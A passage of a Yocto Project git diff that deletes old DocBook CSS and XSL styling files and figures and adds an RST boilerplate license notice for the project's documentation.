-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/adt-manual/figures/adt-title.png b/documentation/adt-manual/figures/adt-title.png
deleted file mode 100644
index 6e71e41f1a..0000000000
--- a/documentation/adt-manual/figures/adt-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/adt-manual/figures/using-a-pre-built-image.png b/documentation/adt-manual/figures/using-a-pre-built-image.png
deleted file mode 100644
index b03130d123..0000000000
--- a/documentation/adt-manual/figures/using-a-pre-built-image.png
+++ /dev/null
Binary files differ
diff --git a/documentation/boilerplate.rst b/documentation/boilerplate.rst
new file mode 100644
index 0000000000..ddffdac242
--- /dev/null
+++ b/documentation/boilerplate.rst
@@ -0,0 +1,18 @@
+.. include:: <xhtml1-lat1.txt>
+.. include:: <xhtml1-symbol.txt>
+
+----
+
+| |project_name|
+| <docs@lists.yoctoproject.org>
+
+Permission is granted to copy, distribute and/or modify this document under the
+terms of the `Creative Commons Attribution-Share Alike 2.0 UK: England & Wales
+<http://creativecommons.org/licenses/by-sa/2.0/uk/>`_ as published by Creative
+Commons.
+
+To report any inaccuracies or problems with this (or any other Yocto Project)
+manual, or to send additions or changes, please send email/patches to the Yocto
+Project documentation mailing list at ``docs@lists.yoctoproject.org`` or
+log into the freenode ``#yocto`` channel.
+
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl
deleted file mode 100644
index 0d57424b59..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-customization.xsl
+++ /dev/null
@@ -1,24 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:import href="brief-yoctoprojectqs-titlepage.xsl"/>
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="generate.toc" select="'article nop'"></xsl:param>
- <xsl:param name="html.stylesheet" select="'brief-yoctoprojectqs-style.css'" />
-</xsl:stylesheet>
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css
deleted file mode 100644
index 386841debe..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-style.css
+++ /dev/null
@@ -1,989 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/bypqs-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title {
- background-position: bottom;
- background-repeat: repeat-x;
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl
deleted file mode 100644
index a435ac77ab..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs-titlepage.xsl
+++ /dev/null
@@ -1,3820 +0,0 @@
-<?xml version="1.0"?>
-
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" version="1.0" exclude-result-prefixes="exsl">
-
-<!-- This stylesheet was created by template/titlepage.xsl-->
-
-<xsl:template name="article.titlepage.recto">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/abstract"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/abstract"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/abstract"/>
- <xsl:choose>
- <xsl:when test="articleinfo/title">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/title"/>
- </xsl:when>
- <xsl:when test="artheader/title">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="articleinfo/subtitle">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="artheader/subtitle">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/corpauthor"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/corpauthor"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/authorgroup"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/authorgroup"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/author"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/author"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/othercredit"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/othercredit"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/releaseinfo"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/releaseinfo"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/copyright"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/copyright"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/legalnotice"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/legalnotice"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/pubdate"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/pubdate"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/pubdate"/>
